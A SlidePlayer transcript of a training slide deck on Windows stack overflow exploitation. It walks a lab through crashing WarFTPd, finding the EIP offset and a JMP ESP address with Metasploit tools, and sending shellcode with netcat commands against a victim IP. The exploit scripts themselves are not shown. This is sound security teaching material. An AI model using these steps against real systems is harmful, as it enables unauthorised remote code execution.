Strategic Security, Inc. © Exploit Development For Mere Mortals Part 4: Windows Stack Overflows Presented By: Joe McCray

Slides:



Advertisements
Similar presentations
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
Advertisements

GROUP 2 WINDOWS INTERNALS TOOLS & WINDOWS SDK DEBUGGING TOOLS David Denhollander Kevin Finkler Corey Sarnia Ailun Shen.
Use After Free Defcon Russia # Feb. 2012
1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.
Project - 1 5/4/2011 The University of Massachusetts Lowell Anthony Gabrielson Adam Helbling.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Chalmers University of Technology Language-based Security Internet Explorer Exploit Christian O. Andersson Jonas Stiborg Andén.
Java Programming Working with TextPad. Using TextPad to Work with Java This text editor is designed for working with Java You can download a trial version.
Buffer Overflow sailaja yagnavajhala sailaja yagnavajhala.
UPLOADING YOUR SERVER CODE TO YOUR VIRTUAL MACHINE.
Engineering H192 - Computer Programming The Ohio State University Gateway Engineering Education Coalition Lect 4P. 1Winter Quarter Introduction to UNIX.
Streaming Twitter. Install pycurl library Use a lab computer From the course website Download the links from pycurl and twitter streamer Extract site-packages.zip,
Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.
The Python interpreter CSE 140 University of Washington Michael Ernst.
Part 3: Advanced Dynamic Analysis Chapter 8: Debugging.
Logging into the linux machines This series of view charts show how to log into the linux machines from the Windows environment. Machine name IP address.
Mitigation of Buffer Overflow Attacks
Brian E. Brzezicki. This tutorial just illustrates the underlying concepts of buffer overflows by way of an extremely simple stack overflow  Most buffer.
Strategic Security, Inc. © Introduction To SQL Injection Presented By: Joe McCray
1 Application Security: Electronic Commerce and Chapter 9 Copyright 2003 Prentice-Hall.
Rpisec.org/2013/ /exploitation.zip For the lazy – rpisec.org/2013/ Windows & Linux Binaries! … macs? RPISEC - 09/13/2013Intro to Memory Corruption1.
ENEE150 – 0202 ANDREW GOFFIN Introduction to ENEE150.
Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail.
 If we set java settings permanently they are available from all command prompts even after system restart.
CNIT 127: Exploit Development Ch 4: Introduction to Heap Overflows
Introduction to Information Security ROP – Recitation 5.
Buffer Overflows Taught by Scott Coté.-. _ _.-. / \.-. ((___)).-. / \ /.ooM \ / \.-. [ x x ].-. / \ /.ooM \ -/ \ /-----\-----/---\--\ /--/---\-----/-----\ / \-
Exploring Spyder: An IDE for scientific computing
Security Attacks Tanenbaum & Bo, Modern Operating Systems:4th ed., (c) 2013 Prentice-Hall, Inc. All rights reserved.
EXPLOITATION CRASH COURSE – FALL 2013 UTD Computer Security Group – Andrew Folloder csg.utdallas.edu (credit: Scott Hand)
CNIT 127: Exploit Development Ch 8: Windows Overflows Part 1.
JMU GenCyber Boot Camp Summer, “Canned” Exploits For many known vulnerabilities attackers do not have to write their own exploit code Many repositories.
Strategic Security, Inc. © Exploit Development For Mere Mortals Part 1: Getting Started Presented By: Joe McCray
How To Silent-Install The AVG Antivirus 2017 Using The DOS Command.
Call us on Toll-Free. Call Us Now Toll Free.
Toll Free Toll Free.
Call us on Toll-Free Call Us Now Toll Free.
Introduction to Information Security
Buffer Overflows ...or How I Learned to Never Trust the User
Mitigation against Buffer Overflow Attacks
Introduction to Information Security
Live Phishing Attack Authentication Activity from a Foreign Address.
CSCE 212Honors Computer Organization
CSC 495/583 Topics of Software Security Stack Overflows (2)
In the below tutorial, you can find the different methods to Boot Windows 10 in Safe Mode : Open System Configuration in Windows 10 is using the Run.
Canon com ijsetup, Canon Inkjet Setup, Canon ijSetup and Installation online, to get started with Canon Setup kindly visit and enter your model number. Canon printer Install. Canon com ijsetup. Download and inst
Dial 1(844) | How to Fix HP PC Error Code 0x
Call to Fix QuickBooks Error 3371
1. Here you need to run the command appwiz.cpl.
Recover Yahoo Mail Password Forgotten Password
Fix windows 10 error code 0xc
Avira Antivirus Customer Helpline Number Contact us:
Enhanced Security Testing- Do Automate Debuggers
Using a Debugger 1-Jan-19.
Smashing the Stack for Fun and Profit
Binary voyeurism A decent overview.
Python 21 Mr. Husch.
Python 19 Mr. Husch.
Python 19 Mr. Husch.
Understanding and Preventing Buffer Overflow Attacks in Unix
CSCE 212Honors Computer Organization
The Python interpreter
System and Cyber Security
FIGURE Illustration of Stack Buffer Overflow
Return-to-libc Attacks
DIBBs Brown Dog Tutorial Setup
Presentation transcript:

Strategic Security, Inc. © Exploit Development For Mere Mortals Part 4: Windows Stack Overflows Presented By: Joe McCray

Strategic Security, Inc. © Windows Stack Overflow Walk-Through

Strategic Security, Inc. © Let's Attack Windows 1.Power off the asterisk VM. 2.Extract and boot the XPIE8 VM. (Boot First option) (Administrator:strategicsec) 3. Start WarFTPd 4. Start WinDBG 5. Press F6 6. attach to war-ftpd.exe Open warftpd1.py in Notepad++. From the XP Host command print we will trigger a crash: > python warftpd1.py | nc victim_ip 21

Strategic Security, Inc. © Let's Attack Windows At WINDBG prompt “r” to show registers or “alt+4” EIP should be ESP should be full of 41s In WinDBG command prompt type: dd eip dd esp

Strategic Security, Inc. © Let's Attack Windows Start WarFTPd Start WinDBG Press F6 attach to war-ftpd.exe at the WINDBG prompt "F5" to start the debugger Debugger is running Open warftpd2.py in Notepad++ From your XP HOST command prompt - trigger the crash: python warftpd2.py | nc victim_ip_addr 21

Strategic Security, Inc. © Let's Attack Windows Eip: esp: affd58 Now we need SSH into the StrategicSec-Ubuntu host (strategicsec:strategicsec) $ cd /home/strategicsec/toolz/metasploit/tools $ ruby pattern_offset.rb $ ruby pattern_offset.rb $ cd /home/strategicsec/toolz/metasploit $./msfpescan –j ESP DLLs/xpsp3/shell32.dll

Strategic Security, Inc. © Let's Attack Windows Open warftpd3.py with Notepad++ Fill in the appropriate values Distance to EIP Address of JMP ESP Open a command prompt on our host Python warftpd3.py | nc victim_ip 21 dd eip & dd esp

Strategic Security, Inc. © Let's Attack Windows Open warftpd4.py in Notepad++. Copy the shell code into warftpd4.py ‘shellcode’ variable. Run warftpd4.py > python warftpd4.py | nc victim_IP 21

Strategic Security, Inc. © Contact Me.... Toll Free: Twitter: LinkedIn:

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.